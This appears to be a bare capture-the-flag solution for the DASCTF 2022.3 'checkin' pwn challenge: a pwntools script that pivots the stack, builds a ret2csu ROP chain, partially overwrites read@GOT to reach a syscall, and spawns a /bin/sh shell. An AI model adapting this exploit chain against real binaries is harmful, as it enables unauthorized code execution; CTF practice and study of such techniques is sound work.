DASCTF2022.3

checkin

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#coding:utf-8
from pwn import *
import time, sys, base64
import ctypes
context.os = 'linux'
context.arch = 'amd64'
# context.arch = 'i386'
context.log_level = 'debug'

# 1 pro
# 2 remote
# 3 127
debug = 1
filename = 'checkin'

if debug == 1 :
    p = process(filename)
if debug == 2:
    p = remote('node4.buuoj.cn',25323)
if debug == 3:
    p = remote('127.0.0.1',12345)
    #23946

elf = ELF('./libc.so.6')
libc = elf.libc


fake_stack = 0x404500
main_read = 0x0000000004011BF
leave = 0x00000000004011E2
read_got = 0x404018
csu_begin = 0x040124A
main = 0x000000000401156

def csu(function,rdi,rsi,rdx):
    payload = p64(0) + p64(1) + p64(rdi) + p64(rsi) + p64(rdx) + p64(function)
    payload += p64(0x401230) + p64(0)*7
    return payload

# gdb.attach(p,'b *0x0000000004011CB')
# gdb.attach(p,'b *0x401239\nc\n')

# 1
payload = 'a'*0xa0 + p64(fake_stack+0xa0) + p64(main_read)
p.send(payload)

payload = p64(csu_begin)
payload += csu(read_got,0,read_got,2) + p64(main)
payload = payload.ljust(0xa0,'\x00')
payload += p64(fake_stack-8) + p64(leave)
p.send(payload)

sleep(0.1)
p.send('\x00\x40')


# 2
bin_sh = 0x404800
fake_stack += 0x200
payload = 'a'*0xa0 + p64(fake_stack+0xa0) + p64(main_read)
p.send(payload)

payload = p64(csu_begin)
payload += p64(0) + p64(1) + p64(0) + p64(fake_stack+0x100) + p64(0x3B) + p64(read_got) + p64(0x0401230)
payload += p64(0)*2 + p64(1) + p64(bin_sh) + p64(0)*2 + p64(read_got) + p64(0x0401230)
payload = payload.ljust(0xa0,'\x00')
payload += p64(fake_stack-8) + p64(leave)
p.send(payload)

sleep(0.1)
payload = '/bin/sh\x00'.ljust(0x3b,'a')
p.send(payload)

p.interactive()